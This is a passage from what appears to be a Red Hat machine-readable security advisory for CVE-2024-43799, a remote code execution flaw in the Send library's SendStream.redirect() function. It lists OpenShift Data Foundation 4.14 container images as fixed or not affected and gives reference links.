product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: 